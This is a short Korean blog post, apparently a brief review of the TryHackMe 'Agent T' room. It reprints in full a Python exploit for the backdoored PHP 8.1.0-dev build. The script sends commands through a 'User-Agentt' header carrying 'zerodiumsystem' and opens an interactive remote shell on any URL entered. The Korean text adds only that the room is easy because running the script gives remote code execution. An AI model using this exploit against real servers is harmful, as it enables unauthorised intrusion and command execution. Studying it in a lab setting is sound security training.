호그와트

에이전트

영웅*^%&$ 2022. 11. 18. 14:22
728x90
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:


#!/usr/bin/env python3
import os
import re
import requests

host = input("Enter the full host url:\n")  #host url
request = requests.Session()
response = request.get(host)

if str(response) == '<Response [200]>':
    print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
    try:
        while 1:
            cmd = input("$ ") #rce
            headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "User-Agentt": "zerodiumsystem('" + cmd + "');"
            }
            response = request.get(host, headers = headers, allow_redirects = False)
            current_page = response.text
            stdout = current_page.split('<!DOCTYPE html>',1)
            text = print(stdout[0])
    except KeyboardInterrupt:
        print("Exiting...")
        exit

else:     #fail
    print("\r")
    print(response)
    print("Host is not available, aborting...")
    exit

오늘은 위에 나오는 아름다운 코드를 직접 실습해볼 수 있는 tryhackme Agent T를 간단 리뷰해보겠습니다. 

사실 이 문제 자체는 너무 쉽습니다. 해당 코드를 실행해서 url을 입력만 해줘도 rce가 진행되기 때문입니다. 

728x90

'호그와트' 카테고리의 다른 글

제 주문은 콤비네이션인데요  (0) 2022.11.18
우리 집에서 바이너리 보구 갈래? 2  (0) 2022.11.18
우리 집에서 바이너리 보구 갈래?  (0) 2022.11.17
거북이의 습격  (0) 2022.11.16
$title 치킨 소스  (0) 2022.11.15